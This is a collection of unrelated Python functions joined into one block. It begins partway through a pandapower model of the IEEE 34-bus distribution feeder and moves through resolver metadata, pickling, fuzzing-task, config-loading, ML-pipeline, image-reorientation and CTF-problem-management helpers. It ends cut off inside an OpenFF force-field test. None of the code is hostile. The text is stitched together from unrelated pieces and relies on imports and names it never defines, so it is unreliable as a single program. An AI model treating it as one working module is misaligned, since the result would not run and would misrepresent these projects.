    "https://site.ieee.org/pes-testfeeders/resources/".
    OUTPUT:
        **net** - The pandapower format network.
    """
    net = pp.create_empty_network()
    # Linedata
    # Overhead-line standard types; r/x/c values cover both the positive-
    # and zero-sequence parameters of the feeder configurations.
    # CF-300
    line_data = {'c_nf_per_km': 3.8250977, 'r_ohm_per_km': 0.69599766,
                 'x_ohm_per_km': 0.5177677,
                 'c0_nf_per_km': 1.86976748, 'r0_ohm_per_km': 1.08727498,
                 'x0_ohm_per_km': 1.47374703,
                 'max_i_ka': 0.23, 'type': 'ol'}
    pp.create_std_type(net, line_data, name='CF-300', element='line')
    # CF-301
    line_data = {'c_nf_per_km': 3.66884364, 'r_ohm_per_km': 1.05015841,
                 'x_ohm_per_km': 0.52265586,
                 'c0_nf_per_km': 1.82231544, 'r0_ohm_per_km': 1.48350255,
                 'x0_ohm_per_km': 1.60203942,
                 'max_i_ka': 0.18, 'type': 'ol'}
    pp.create_std_type(net, line_data, name='CF-301', element='line')
    # CF-302
    line_data = {'c_nf_per_km': 0.8751182, 'r_ohm_per_km': 0.5798427,
                 'x_ohm_per_km': 0.30768221,
                 'c0_nf_per_km': 0.8751182, 'r0_ohm_per_km': 0.5798427,
                 'x0_ohm_per_km': 0.30768221,
                 'max_i_ka': 0.14, 'type': 'ol'}
    pp.create_std_type(net, line_data, name='CF-302', element='line')
    # CF-303 (same parameters as CF-302)
    line_data = {'c_nf_per_km': 0.8751182, 'r_ohm_per_km': 0.5798427,
                 'x_ohm_per_km': 0.30768221,
                 'c0_nf_per_km': 0.8751182, 'r0_ohm_per_km': 0.5798427,
                 'x0_ohm_per_km': 0.30768221,
                 'max_i_ka': 0.14, 'type': 'ol'}
    pp.create_std_type(net, line_data, name='CF-303', element='line')
    # CF-304
    line_data = {'c_nf_per_km': 0.90382554, 'r_ohm_per_km': 0.39802955,
                 'x_ohm_per_km': 0.29436416,
                 'c0_nf_per_km': 0.90382554, 'r0_ohm_per_km': 0.39802955,
                 'x0_ohm_per_km': 0.29436416,
                 'max_i_ka': 0.18, 'type': 'ol'}
    pp.create_std_type(net, line_data, name='CF-304', element='line')
    # Busses
    # Main feeder runs at 24.9 kV; busses 888/890 sit behind the 4.16 kV
    # step-down transformer. The 69 kV substation bus is commented out.
    # bus0 = pp.create_bus(net, name='Bus 0', vn_kv=69.0, type='n', zone='34_BUS')
    bus_800 = pp.create_bus(net, name='Bus 800', vn_kv=24.9, type='n', zone='34_BUS')
    bus_802 = pp.create_bus(net, name='Bus 802', vn_kv=24.9, type='n', zone='34_BUS')
    bus_806 = pp.create_bus(net, name='Bus 806', vn_kv=24.9, type='n', zone='34_BUS')
    bus_808 = pp.create_bus(net, name='Bus 808', vn_kv=24.9, type='n', zone='34_BUS')
    bus_810 = pp.create_bus(net, name='Bus 810', vn_kv=24.9, type='n', zone='34_BUS')
    bus_812 = pp.create_bus(net, name='Bus 812', vn_kv=24.9, type='n', zone='34_BUS')
    bus_814 = pp.create_bus(net, name='Bus 814', vn_kv=24.9, type='n', zone='34_BUS')
    bus_850 = pp.create_bus(net, name='Bus 850', vn_kv=24.9, type='n', zone='34_BUS')
    bus_816 = pp.create_bus(net, name='Bus 816', vn_kv=24.9, type='n', zone='34_BUS')
    bus_818 = pp.create_bus(net, name='Bus 818', vn_kv=24.9, type='n', zone='34_BUS')
    bus_820 = pp.create_bus(net, name='Bus 820', vn_kv=24.9, type='n', zone='34_BUS')
    bus_822 = pp.create_bus(net, name='Bus 822', vn_kv=24.9, type='n', zone='34_BUS')
    bus_824 = pp.create_bus(net, name='Bus 824', vn_kv=24.9, type='n', zone='34_BUS')
    bus_826 = pp.create_bus(net, name='Bus 826', vn_kv=24.9, type='n', zone='34_BUS')
    bus_828 = pp.create_bus(net, name='Bus 828', vn_kv=24.9, type='n', zone='34_BUS')
    bus_830 = pp.create_bus(net, name='Bus 830', vn_kv=24.9, type='n', zone='34_BUS')
    bus_854 = pp.create_bus(net, name='Bus 854', vn_kv=24.9, type='n', zone='34_BUS')
    bus_852 = pp.create_bus(net, name='Bus 852', vn_kv=24.9, type='n', zone='34_BUS')
    bus_832 = pp.create_bus(net, name='Bus 832', vn_kv=24.9, type='n', zone='34_BUS')
    bus_858 = pp.create_bus(net, name='Bus 858', vn_kv=24.9, type='n', zone='34_BUS')
    bus_834 = pp.create_bus(net, name='Bus 834', vn_kv=24.9, type='n', zone='34_BUS')
    bus_842 = pp.create_bus(net, name='Bus 842', vn_kv=24.9, type='n', zone='34_BUS')
    bus_844 = pp.create_bus(net, name='Bus 844', vn_kv=24.9, type='n', zone='34_BUS')
    bus_846 = pp.create_bus(net, name='Bus 846', vn_kv=24.9, type='n', zone='34_BUS')
    bus_848 = pp.create_bus(net, name='Bus 848', vn_kv=24.9, type='n', zone='34_BUS')
    bus_860 = pp.create_bus(net, name='Bus 860', vn_kv=24.9, type='n', zone='34_BUS')
    bus_836 = pp.create_bus(net, name='Bus 836', vn_kv=24.9, type='n', zone='34_BUS')
    bus_840 = pp.create_bus(net, name='Bus 840', vn_kv=24.9, type='n', zone='34_BUS')
    bus_862 = pp.create_bus(net, name='Bus 862', vn_kv=24.9, type='n', zone='34_BUS')
    bus_838 = pp.create_bus(net, name='Bus 838', vn_kv=24.9, type='n', zone='34_BUS')
    bus_864 = pp.create_bus(net, name='Bus 864', vn_kv=24.9, type='n', zone='34_BUS')
    bus_888 = pp.create_bus(net, name='Bus 888', vn_kv=4.16, type='n', zone='34_BUS')
    bus_890 = pp.create_bus(net, name='Bus 890', vn_kv=4.16, type='n', zone='34_BUS')
    bus_856 = pp.create_bus(net, name='Bus 856', vn_kv=24.9, type='n', zone='34_BUS')
    # Lines
    # Lines 6 and 24 are commented out; those connections are represented by
    # the two regulator transformers created below instead.
    pp.create_line(net, bus_800, bus_802, length_km=0.786384, std_type='CF-300', name='Line 0')
    pp.create_line(net, bus_802, bus_806, length_km=0.527304, std_type='CF-300', name='Line 1')
    pp.create_line(net, bus_806, bus_808, length_km=9.823704, std_type='CF-300', name='Line 2')
    pp.create_line(net, bus_808, bus_810, length_km=1.769059, std_type='CF-303', name='Line 3')
    pp.create_line(net, bus_808, bus_812, length_km=11.43000, std_type='CF-300', name='Line 4')
    pp.create_line(net, bus_812, bus_814, length_km=9.061704, std_type='CF-300', name='Line 5')
    # pp.create_line(net, bus_814, bus_850, length_km=0.003048, std_type='CF-301', name='Line 6')
    pp.create_line(net, bus_816, bus_818, length_km=0.521208, std_type='CF-302', name='Line 7')
    pp.create_line(net, bus_816, bus_824, length_km=3.112008, std_type='CF-301', name='Line 8')
    pp.create_line(net, bus_818, bus_820, length_km=14.67612, std_type='CF-302', name='Line 9')
    pp.create_line(net, bus_820, bus_822, length_km=4.187952, std_type='CF-302', name='Line 10')
    pp.create_line(net, bus_824, bus_826, length_km=0.923544, std_type='CF-303', name='Line 11')
    pp.create_line(net, bus_824, bus_828, length_km=0.256032, std_type='CF-301', name='Line 12')
    pp.create_line(net, bus_828, bus_830, length_km=6.230112, std_type='CF-301', name='Line 13')
    pp.create_line(net, bus_830, bus_854, length_km=0.158496, std_type='CF-301', name='Line 14')
    pp.create_line(net, bus_832, bus_858, length_km=1.493520, std_type='CF-301', name='Line 15')
    pp.create_line(net, bus_834, bus_860, length_km=0.615696, std_type='CF-301', name='Line 16')
    pp.create_line(net, bus_834, bus_842, length_km=0.085344, std_type='CF-301', name='Line 17')
    pp.create_line(net, bus_836, bus_840, length_km=0.262128, std_type='CF-301', name='Line 18')
    pp.create_line(net, bus_836, bus_862, length_km=0.085344, std_type='CF-301', name='Line 19')
    pp.create_line(net, bus_842, bus_844, length_km=0.411480, std_type='CF-301', name='Line 20')
    pp.create_line(net, bus_844, bus_846, length_km=1.109472, std_type='CF-301', name='Line 21')
    pp.create_line(net, bus_846, bus_848, length_km=0.161544, std_type='CF-301', name='Line 22')
    pp.create_line(net, bus_850, bus_816, length_km=0.094488, std_type='CF-301', name='Line 23')
    # pp.create_line(net, bus_852, bus_832, length_km=0.003048, std_type='CF-301', name='Line 24')
    pp.create_line(net, bus_854, bus_856, length_km=7.110984, std_type='CF-303', name='Line 25')
    pp.create_line(net, bus_854, bus_852, length_km=11.22578, std_type='CF-301', name='Line 26')
    pp.create_line(net, bus_858, bus_864, length_km=0.493776, std_type='CF-302', name='Line 27')
    pp.create_line(net, bus_858, bus_834, length_km=1.776984, std_type='CF-301', name='Line 28')
    pp.create_line(net, bus_860, bus_836, length_km=0.816864, std_type='CF-301', name='Line 29')
    pp.create_line(net, bus_860, bus_838, length_km=1.481328, std_type='CF-304', name='Line 30')
    pp.create_line(net, bus_888, bus_890, length_km=3.218688, std_type='CF-300', name='Line 31')
    # Regulator 1
    # Voltage regulators are modelled as 1:1 transformers with a +/-16 step
    # tap changer (0.625 % per step).
    pp.create_transformer_from_parameters(net, bus_814, bus_850, sn_mva=2.5, vn_hv_kv=24.9,
                                          vn_lv_kv=24.9, vkr_percent=0.320088*2.5, vk_percent=0.357539*2.5,
                                          pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
                                          tap_side='lv', tap_neutral=0, tap_max=16, tap_min=-16,
                                          tap_step_percent=0.625, tap_pos=0, tap_phase_shifter=False,
                                          name='Regulator 1')
    # Regulator 2
    pp.create_transformer_from_parameters(net, bus_852, bus_832, sn_mva=2.5, vn_hv_kv=24.9,
                                          vn_lv_kv=24.9, vkr_percent=0.320088*2.5, vk_percent=0.357539*2.5,
                                          pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
                                          tap_side='lv', tap_neutral=0, tap_max=16, tap_min=-16,
                                          tap_step_percent=0.625, tap_pos=0, tap_phase_shifter=False,
                                          name='Regulator 2')
    # # Substation
    # pp.create_transformer_from_parameters(net, bus0, bus_800, sn_mva=2.5, vn_hv_kv=69.0,
    #                                       vn_lv_kv=24.9, vkr_percent=1.0, vk_percent=8.062257,
    #                                       pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
    #                                       tap_side='lv', tap_neutral=0, tap_max=2, tap_min=-2,
    #                                       tap_step_percent=2.5, tap_pos=0, tap_phase_shifter=False,
    #                                       name='Substation')
    # Traformer
    # 24.9 kV -> 4.16 kV step-down feeding busses 888/890.
    pp.create_transformer_from_parameters(net, bus_832, bus_888, sn_mva=0.5, vn_hv_kv=24.9,
                                          vn_lv_kv=4.16, vkr_percent=1.9, vk_percent=4.5,
                                          pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
                                          name='Transformer 1')
    # Loads
    # Distributed loads first, then the "spot" loads of the original feeder.
    pp.create_load(net, bus_806, p_mw=0.055, q_mvar=0.029, name='Load 806')
    pp.create_load(net, bus_810, p_mw=0.016, q_mvar=0.008, name='Load 810')
    pp.create_load(net, bus_820, p_mw=0.034, q_mvar=0.017, name='Load 820')
    pp.create_load(net, bus_822, p_mw=0.135, q_mvar=0.070, name='Load 822')
    pp.create_load(net, bus_824, p_mw=0.005, q_mvar=0.002, name='Load 824')
    pp.create_load(net, bus_826, p_mw=0.004, q_mvar=0.020, name='Load 826')
    pp.create_load(net, bus_828, p_mw=0.004, q_mvar=0.002, name='Load 828')
    pp.create_load(net, bus_830, p_mw=0.007, q_mvar=0.003, name='Load 830')
    pp.create_load(net, bus_856, p_mw=0.004, q_mvar=0.002, name='Load 856')
    pp.create_load(net, bus_858, p_mw=0.015, q_mvar=0.007, name='Load 858')
    pp.create_load(net, bus_864, p_mw=0.002, q_mvar=0.001, name='Load 864')
    pp.create_load(net, bus_834, p_mw=0.032, q_mvar=0.017, name='Load 834')
    pp.create_load(net, bus_860, p_mw=0.029, q_mvar=0.073, name='Load 860')
    pp.create_load(net, bus_836, p_mw=0.082, q_mvar=0.043, name='Load 836')
    pp.create_load(net, bus_840, p_mw=0.040, q_mvar=0.020, name='Load 840')
    pp.create_load(net, bus_838, p_mw=0.028, q_mvar=0.014, name='Load 838')
    pp.create_load(net, bus_844, p_mw=0.009, q_mvar=0.005, name='Load 844')
    pp.create_load(net, bus_846, p_mw=0.037, q_mvar=0.031, name='Load 846')
    pp.create_load(net, bus_848, p_mw=0.023, q_mvar=0.011, name='Load 848')
    pp.create_load(net, bus_860, p_mw=0.060, q_mvar=0.048, name='Load 860 spot')
    pp.create_load(net, bus_840, p_mw=0.027, q_mvar=0.021, name='Load 840 spot')
    pp.create_load(net, bus_844, p_mw=0.405, q_mvar=0.315, name='Load 844 spot')
    pp.create_load(net, bus_848, p_mw=0.060, q_mvar=0.048, name='Load 848 spot')
    pp.create_load(net, bus_890, p_mw=0.450, q_mvar=0.225, name='Load 890 spot')
    pp.create_load(net, bus_830, p_mw=0.045, q_mvar=0.020, name='Load 830 spot')
    # External grid
    pp.create_ext_grid(net, bus_800, vm_pu=1.0, va_degree=0.0, s_sc_max_mva=10.0,
                       s_sc_min_mva=10.0, rx_max=1, rx_min=1, r0x0_max=1, x0x_max=1)
    # Distributed generators
    # NOTE(review): the PV/WP units are created with zero reactive-power
    # limits, i.e. they are treated as unity-power-factor units.
    pp.create_sgen(net, bus_848, p_mw=0.66, q_mvar=0.500, name='DG 1', max_p_mw=0.66, min_p_mw=0, max_q_mvar=0.5, min_q_mvar=0)
    pp.create_sgen(net, bus_890, p_mw=0.50, q_mvar=0.375, name='DG 2', max_p_mw=0.50, min_p_mw=0, max_q_mvar=0.375, min_q_mvar=0)
    pp.create_sgen(net, bus_822, p_mw=0.1, type='PV', name='PV 1', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    pp.create_sgen(net, bus_856, p_mw=0.1, type='PV', name='PV 2', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    pp.create_sgen(net, bus_838, p_mw=0.1, type='PV', name='PV 3', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    pp.create_sgen(net, bus_822, p_mw=0.1, type='WP', name='WP 1', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    pp.create_sgen(net, bus_826, p_mw=0.1, type='WP', name='WP 2', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    pp.create_sgen(net, bus_838, p_mw=0.1, type='WP', name='WP 3', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
    # Shunt capacity bank
    # Negative q_mvar = capacitive injection, in 4 switchable steps.
    pp.create_shunt(net, bus_840, q_mvar=-0.12, name='SCB 1', step=4, max_step=4)
    pp.create_shunt(net, bus_864, q_mvar=-0.12, name='SCB 2', step=4, max_step=4)
    # storage
    pp.create_storage(net, bus_810, p_mw=0.5, max_e_mwh=2, sn_mva=1.0, soc_percent=50, min_e_mwh=0.2, name='Storage')
    return net
def set_metadata(candidates, traces, dependencies, pythons):
    """Attach marker metadata to candidates based on the dependency tree.

    Metadata for a candidate includes markers and a specifier for Python
    version requirements.

    :param candidates: A key-candidate mapping. Candidates in the mapping will
        have their markers set.
    :param traces: A graph trace (produced by `traces.trace_graph`) providing
        information about dependency relationships between candidates.
    :param dependencies: A key-collection mapping containing what dependencies
        each candidate in `candidates` requested.
    :param pythons: A key-str mapping containing Requires-Python information
        of each candidate.

    Keys in mappings and entries in the trace are identifiers of a package,
    as implemented by the `identify` method of the resolver's provider.
    The candidates are modified in-place.
    """
    # Deep-copy the traces so the metaset calculation cannot mutate the
    # caller's graph trace.
    metasets = _calculate_metasets_mapping(
        dependencies, pythons, copy.deepcopy(traces),
    )
    for identifier, candidate in candidates.items():
        candidate.markers = _format_metasets(metasets[identifier])
def _hack_namedtuple(cls):
    """Patch a namedtuple class in place so its instances can be pickled."""
    cls_name = cls.__name__
    cls_fields = cls._fields

    def _reduce(self):
        # Rebuild through _restore so unpickling does not need the original
        # (dynamically created) class to be importable.
        return (_restore, (cls_name, cls_fields, tuple(self)))

    cls.__reduce__ = _reduce
    cls._is_namedtuple_ = True
    return cls
def create_symbolize_task_if_needed(testcase):
    """Schedule a symbolize task for |testcase| when one can actually run.

    Symbolization is skipped for custom binaries (no archived symbolized
    builds exist) and for jobs that define no symbolized build url pattern.
    """
    if build_manager.is_custom_binary() or not build_manager.has_symbolized_builds():
        return
    tasks.add_task('symbolize', testcase.key.id(), testcase.job_type)
def load_config(settings_file='./test_settings.py'):
    """Load the application configuration.

    The file named by the PULLSBURY_SETTINGS environment variable wins;
    otherwise ``settings_file`` is loaded. If a LOGGING_CONFIG entry is
    present, logging is configured from it, and a fixed set of JSON-encoded
    settings is decoded into Python objects.
    """
    config = Config(os.getcwd())
    if 'PULLSBURY_SETTINGS' in os.environ:
        config.from_envvar('PULLSBURY_SETTINGS')
    else:
        config.from_pyfile(settings_file)
    if config.get('LOGGING_CONFIG'):
        logging.config.fileConfig(
            config.get('LOGGING_CONFIG'),
            disable_existing_loggers=False)
    # These settings are stored as JSON strings; decode them in place,
    # defaulting to an empty object when absent.
    for key in ('TEAMS',
                'HAPPY_SLACK_EMOJIS',
                'REPO_BLACKLIST',
                'SLACK_CUSTOM_EMOJI_MAPPING'):
        config.update({
            key: json.loads(config.get(key, '{}'))
        })
    return config
def build_model():
    """Build and tune the classification model.

    Parameters:
        No arguments

    Returns:
        cv (estimator): GridSearchCV-wrapped pipeline, tuned over the
        tf-idf smoothing flag.
    """
    # Text branch: bag-of-words counts followed by tf-idf weighting.
    text_pipeline = Pipeline([
        ('vect', CountVectorizer(tokenizer=tokenize)),
        ('tfidf', TfidfTransformer())
    ])
    # Combine the text features with the starting-verb indicator feature.
    features = FeatureUnion([
        ('text_pipeline', text_pipeline),
        ('starting_verb', StartingVerbExtractor())
    ])
    pipeline = Pipeline([
        ('Features', features),
        ('clf', MultiOutputClassifier(DecisionTreeClassifier()))
    ])
    # Grid-search over the remaining hyperparameter of interest
    # (a max_df grid was explored previously and dropped).
    parameters = {
        'Features__text_pipeline__tfidf__smooth_idf': (True, False)
    }
    cv = GridSearchCV(pipeline, param_grid=parameters)
    return cv
def date_range(
    start: pandas._libs.tslibs.timestamps.Timestamp,
    end: pandas._libs.tslibs.timestamps.Timestamp,
    freq: Literal["1M"],
):
    """
    usage.dask: 1
    """
    # Auto-generated API-usage stub: the docstring records the observed call
    # count per client library (here: once from dask). No runnable body.
    ...
def INPUT_BTN(**attributes):
    """Build a styled button: an INPUT wrapped in left/right styling SPANs."""
    button = INPUT(_class="button-right", **attributes)
    return SPAN(button, _class="button-left")
def load_annotations(file_path):
    """Loads a file containing annotations for multiple documents.

    The file should contain lines with the following format:
    <DOCUMENT ID> <LINES> <SPAN START POSITIONS> <SPAN LENGTHS> <SEVERITY>
    Fields are separated by tabs; LINE, SPAN START POSITIONS and SPAN LENGTHS
    can have a list of values separated by white space.

    Args:
        file_path: path to the file.
    Returns:
        a dictionary mapping document id's to a list of annotations.
    """
    annotations = defaultdict(list)
    with open(file_path, 'r', encoding='utf8') as f:
        # Start at 1 so diagnostics report human-friendly 1-based line
        # numbers (previously the 0-based enumerate index was printed).
        for i, line in enumerate(f, start=1):
            line = line.strip()
            if not line:
                continue
            fields = line.split('\t')
            doc_id = fields[0]
            try:
                annotation = Annotation.from_fields(fields[1:])
            except OverlappingSpans:
                # Skip malformed annotations but keep processing the file.
                msg = 'Overlapping spans when reading line %d of file %s '
                msg %= (i, file_path)
                print(msg)
                continue
            annotations[doc_id].append(annotation)
    return annotations
def search(request, template_name='blog/post_search.html'):
    """
    Search for blog posts.

    Renders a simple search form and, when a query is submitted, returns
    posts matching the search string. Queries are passed through a stop-word
    filter to drop words like 'the', 'a', or 'have' and improve the results.

    Template: ``blog/post_search.html``
    Context:
        object_list
            List of blog posts that match given search term(s).
        search_term
            Given search term.
    """
    context = {}
    if request.GET:
        stop_words = re.compile(STOP_WORDS_RE, re.IGNORECASE)
        search_term = '%s' % request.GET['q']
        cleaned_term = stop_words.sub('', search_term).strip()
        if cleaned_term:
            matches = Post.objects.published().filter(
                Q(title__icontains=cleaned_term)
                | Q(body__icontains=cleaned_term)
                | Q(tags__icontains=cleaned_term)
                | Q(categories__title__icontains=cleaned_term)
            )
            context = {'object_list': matches, 'search_term': search_term}
        else:
            context = {'message': 'Search term was too vague. Please try again.'}
    return render(request, template_name, context)
def orient_data (data, header, header_out=None, MLBG_rot90_flip=False, log=None,
                 tel=None):
    """Function to remap [data] from the CD matrix defined in [header] to
    the CD matrix taken from [header_out]. If the latter is not
    provided the output orientation will be North up, East left.
    If [MLBG_rot90_flip] is switched on and the data is from MeerLICHT or
    BlackGEM, the data will be oriented within a few degrees from
    North up, East left while preserving the pixel values in the new,
    *remapped* reference, D and Scorr images.

    :param data: square 2D image array to reorient (must be N x N)
    :param header: FITS-like header containing the input CD?_? keywords
    :param header_out: optional header providing the target CD matrix
    :param MLBG_rot90_flip: if True and [tel] is a MeerLICHT/BlackGEM
        telescope, use an exact 90-degree rotation (plus a left/right flip
        for ML1) instead of a general affine remap
    :param log: optional logger for diagnostics
    :param tel: telescope identifier ('ML1', 'BG2', 'BG3' or 'BG4')
    :return: the reoriented 2D array (may be the input array unchanged if
        the input and output CD matrices already agree)
    """
    # rotation matrix:
    # R = [[dx * cos(theta), dy * -sin(theta)],
    #      [dx * sin(theta), dy * cos(theta)]]
    # with theta=0: North aligned with positive y-axis
    # and East with the positive x-axis (RA increases to the East)
    #
    # N.B.: np.dot(R, [[x], [y]]) = np.dot([x,y], R.T)
    #
    # matrices below are defined using the (WCS) header keywords
    # CD?_?:
    #
    # [ CD1_1 CD2_1 ]
    # [ CD1_2 CD2_2 ]
    #
    # orient [data] with its orientation defined in [header] to the
    # orientation defined in [header_out]. If the latter is not
    # provided, the output orientation will be North up, East left.

    # check if input data is square; if it is not, the transformation
    # will not be done properly.
    assert data.shape[0] == data.shape[1]

    # define data CD matrix, assumed to be in [header]
    CD_data = read_CD_matrix (header, log=log)

    # determine output CD matrix, either from [header_out] or North
    # up, East left
    if header_out is not None:
        CD_out = read_CD_matrix (header_out, log=log)
    else:
        # define de CD matrix with North up and East left, using the
        # pixel scale from the input [header]
        pixscale = read_header(header, ['pixscale'])
        cdelt = pixscale/3600
        CD_out = np.array([[-cdelt, 0], [0, cdelt]])

    # check if values of CD_data and CD_out are similar
    CD_close = [math.isclose(CD_data[i,j], CD_out[i,j], rel_tol=1e-3)
                for i in range(2) for j in range(2)]

    #if log is not None:
    #    log.info ('CD_close: {}'.format(CD_close))

    if np.all(CD_close):
        #if log is not None:
        #    log.info ('data CD matrix already similar to CD_out matrix; '
        #              'no need to remap data')
        # if CD matrix values are all very similar, do not bother to
        # do the remapping
        data2return = data

    elif MLBG_rot90_flip and tel in ['ML1', 'BG2', 'BG3', 'BG4']:
        #if log is not None:
        #    log.info ('for ML/BG: rotating data by exactly 90 degrees and for '
        #              'ML also flip left/right')
        # rotate data by exactly 90 degrees counterclockwise (when
        # viewing data with y-axis increasing to the top!) and for ML1
        # also flip in the East-West direction; for ML/BG this will
        # result in an image within a few degrees of the North up,
        # East left orientation while preserving the original pixel
        # values of the new, *remapped* reference, D and Scorr images.
        data2return = np.rot90(data, k=-1)
        if tel=='ML1':
            data2return = np.fliplr(data2return)
        # equivalent operation: data2return = np.flipud(np.rot90(data))

    else:
        #if log is not None:
        #    log.info ('remapping data from input CD matrix: {} to output CD '
        #              'matrix: {}'.format(CD_data, CD_out))
        # transformation matrix, which is the dot product of the
        # output CD matrix and the inverse of the data CD matrix
        CD_data_inv = np.linalg.inv(CD_data)
        CD_trans = np.dot(CD_out, CD_data_inv)
        # transpose and flip because [affine_transform] performs
        # np.dot(matrix, [[y],[x]]) rather than np.dot([x,y], matrix)
        matrix = np.flip(CD_trans.T)
        # offset, calculated from
        #
        # [xi - dxi, yo - dyo] = np.dot( [xo - dxo, yo - dyo], CD_trans )
        #
        # where xi, yi are the input coordinates corresponding to the
        # output coordinates xo, yo in data and dxi/o, dyi/o are the
        # corresponding offsets from the point of
        # rotation/transformation, resulting in
        #
        # [xi, yi] = np.dot( [xo, yo], CD_trans ) + offset
        # with
        # offset = -np.dot( [dxo, dyo], CD_trans ) + [dxi, dyi]
        # setting [dx0, dy0] and [dxi, dyi] to the center
        center = (np.array(data.shape)-1)/2
        offset = -np.dot(center, np.flip(CD_trans)) + center
        # infer transformed data
        data2return = ndimage.affine_transform(data, matrix, offset=offset,
                                               mode='nearest')
    return data2return
def _batchnorm_to_groupnorm(module: nn.modules.batchnorm._BatchNorm) -> nn.Module:
    """
    Converts a BatchNorm ``module`` to GroupNorm module.
    This is a helper function.

    Args:
        module: BatchNorm module to be replaced

    Returns:
        GroupNorm module that can replace the BatchNorm module provided

    Notes:
        A default value of 32 is chosen for the number of groups based on the
        paper *Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour*
        https://arxiv.org/pdf/1706.02677.pdf
    """
    num_channels = module.num_features
    # Cap at 32 groups; narrow layers fall back to one group per channel.
    num_groups = min(32, num_channels)
    return nn.GroupNorm(num_groups, num_channels, affine=True)
def uninstall_problem(problem_name):
    """
    Uninstalls a given problem, which means that the generated debian package
    and source files within the SHARED_ROOT directory are removed.
    An uninstalled problem will no longer appear when listing problems, even
    if deployed instances remain (undeploying all instances of a problem
    before uninstallation is recommended.)
    Additionally, any assigned instance ports for the problem will be
    removed from the port map.
    """
    acquire_lock()
    try:
        # Remove .deb package used to install dependencies on deployment
        os.remove(join(DEB_ROOT, problem_name + '.deb'))
        # Remove problem source used for templating instances
        shutil.rmtree(join(PROBLEM_ROOT, problem_name))
        # Remove any ports assigned to this problem from the port map.
        # Keys are stored as repr'd tuples of (problem_name, ...), so they
        # are round-tripped through literal_eval/repr for filtering.
        port_map_path = join(SHARED_ROOT, 'port_map.json')
        with open(port_map_path, 'r') as f:
            port_map = json.load(f)
        port_map = {literal_eval(k): v for k, v in port_map.items()}
        port_map = {k: v for k, v in port_map.items() if k[0] != problem_name}
        with open(port_map_path, 'w') as f:
            stringified_port_map = {repr(k): v for k, v in port_map.items()}
            json.dump(stringified_port_map, f)
        logger.info(f"{problem_name} removed successfully")
    except Exception as e:
        logger.error(
            f"An error occurred while uninstalling {problem_name}:")
        logger.error(f'{str(e)}')
        raise FatalException
    finally:
        # BUGFIX: previously the lock was only released on the success path,
        # so a failed uninstall left the lock held forever.
        release_lock()
def _check_wd():
    """
    Verify that the plot directory exists and is writable by the user.

    :raises SystemExit: if the folder is absent or the user has no write permission
    """
    # Checks run in order; the first failure is logged and aborts.
    checks = (
        (lambda path: os.path.exists(path), 'Impossible to read %s'),
        (lambda path: os.access(path, os.W_OK), 'Impossible to write into %s'),
    )
    for passes, message in checks:
        if not passes(_plot_dir):
            _logger.warning(message % _plot_dir)
            raise SystemExit
def main(cfg, dry_run):
    """Work with domino compute nodes from your local machine.
    To work with files in a domino project locally, you need
    to either mount the domino directory on your machine (not yet
    supported by this script) or copy files back and forth.
    This script manages that copy back-and-forth using rsync,
    and a configuration file in the directory you are syncing with domino.
    This tool relies on a configuration file, `{__CONFIG__!s}`, which
    you can create with the `init` command. All of the subcommands
    for this tool will accept the full ssh command string from
    domino (something like `ssh -p 49001 ubuntu@ec2-*.us-west-2.compute.amazonaws.com`).
    You can cache this string using the `box` subcommand, which
    'boxes' up your connection string and adds it to the
    configuration file (`{__CONFIG__!s}`) for later use. Unfortunately,
    there does not seem to be a way to automatically discover the
    ec2 address of the host machine for a given domino run
    programatically.
    Commonly useful commands other than `init` and `box` are `up` and
    `down`, which rsync files up to and down from domino respectively
    using rsync to ensure that only changed files are moved. Also,
    the `ssh` command will open an ssh connection and return the command
    line to you. This is mostly useful if you've stored connection
    info using `box`. Finally, `ddd` will open a persistent ssh connection
    and set up port forwarding for the dask dashboard, which you can then
    open in a webbrowser. This requires that you have the `jt.py` script
    on your path as well as this script.
    """
    # NOTE: the docstring doubles as the CLI help text; the {__CONFIG__!s}
    # placeholders are presumably substituted elsewhere — do not reformat.
    # Stash the --dry-run flag in the shared config so the rsync
    # subcommands can honour it.
    cfg['rsync.dry_run'] = dry_run
def _compute_bic(
    data: np.array,
    n_clusters: int
) -> BICResult:
    """Fit a Gaussian mixture and report its BIC statistic.

    Parameters
    ----------
    data: np.array
        The data to cluster.
    n_clusters: int
        Number of clusters to test.

    Returns
    -------
    results: BICResult
        The results as a BICResult object.
    """
    model = GaussianMixture(n_clusters)
    model.fit(data)
    bic_value = model.bic(data)
    return BICResult(bic_value, n_clusters)
def release_branch_name(config):
    """Return the expected release branch name for the current config."""
    prefix = config.gitflow_release_prefix()
    version = config.package_version()
    return "{0}{1}".format(prefix, version)
def torch2numpy(data):
    """Convert a torch tensor to a numpy array on the CPU.

    Generalized beyond CPU-only tensors: ``detach()`` drops any autograd
    graph and ``cpu()`` moves accelerator tensors to host memory; both are
    no-ops for a plain CPU tensor, so existing callers are unaffected.
    """
    return data.detach().cpu().numpy()
def test_openmm_nonbonded_methods(inputs):
    """See test_nonbonded_method_resolution in openff/toolkit/tests/test_forcefield.py

    `inputs` supplies a vdW method, an electrostatics method, a periodicity
    flag, and an expected `result`: either an OpenMM nonbonded-method
    constant (an int) that the produced system must use, or an exception
    type that the conversion must raise.
    """
    vdw_method = inputs["vdw_method"]
    electrostatics_method = inputs["electrostatics_method"]
    periodic = inputs["periodic"]
    result = inputs["result"]
    molecules = [create_ethanol()]
    forcefield = ForceField("test_forcefields/test_forcefield.offxml")
    pdbfile = app.PDBFile(get_data_file_path("systems/test_systems/1_ethanol.pdb"))
    topology = Topology.from_openmm(pdbfile.topology, unique_molecules=molecules)
    # A topology without box vectors is treated as non-periodic.
    if not periodic:
        topology.box_vectors = None
    if type(result) == int:
        nonbonded_method = result
        # The method is validated and may raise an exception if it's not supported.
        forcefield.get_parameter_handler("vdW", {}).method = vdw_method
        forcefield.get_parameter_handler(
            "Electrostatics", {}
        ).method = electrostatics_method
